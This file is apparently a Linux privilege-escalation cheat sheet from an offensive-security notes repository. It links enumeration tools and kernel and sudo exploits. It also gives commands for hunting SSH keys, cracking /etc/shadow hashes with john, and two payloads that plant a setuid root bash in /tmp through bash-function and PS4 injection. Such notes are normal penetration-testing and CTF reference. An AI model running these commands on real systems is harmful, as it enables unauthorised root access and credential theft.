killchain-compendium/post exploitation/priv_esc/docs/linux_priv_esc.md

82 lines
2.5 KiB
Markdown

# Linux Privilege Escalation
## Links
* [Basics](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [LinEnum](https://github.com/rebootuser/LinEnum)
* [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)
* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
* [GTFObins](https://gtfobins.github.io/)
* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
## Kernel Exploits
### Dirty COW
* [CVE-2016-5195](https://dirtycow.ninja/)
* [c0w.c](../kernel-exploits/dirtycow)
## Stored Keys & Passwords
* History
* Environment Variables
* Config + Dot Files
* SSH keys
```sh
find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
```
## Permissions
* Weak permissions
* Umask
* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
* e.g. `john --wordlist=./wordlist --format=crypt hash`
* SUID
* list
```sh
find / -perm /6000 -ls 2>dev/null
```
* [Shared object injection](../../../exploit/linux/shared_object_injection.md)
* [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
* User specific files
```sh
find / -user root -name "*.txt"
```
## Sudo Binary
* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)
* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)
* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)
* `sudo -l`
* Take a look at GTFObins
* Keep an eye on the displayed host and env capabilities
## PATH Hijacking
* Interpositioning binaries via PATH
* Look for binaries used in other bins and scripts
* Interposition name and add the directory in front of `$PATH`
## Bash function
* Interpositioning of binaries via bash functions
```sh
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
```
```sh
export -f /path/to/binary
```
* Call binary which invokes this function
## Environment Variable
```sh
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
```
## Capabilities
* [capabilities](../../../exploit/linux/capabilities.md)
## Crontab
* Check `cat /etc/crontab`
* Check writable scripts and binaries that are scheduled
* Check `$PATH` order
## NFS Rootsquash
* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)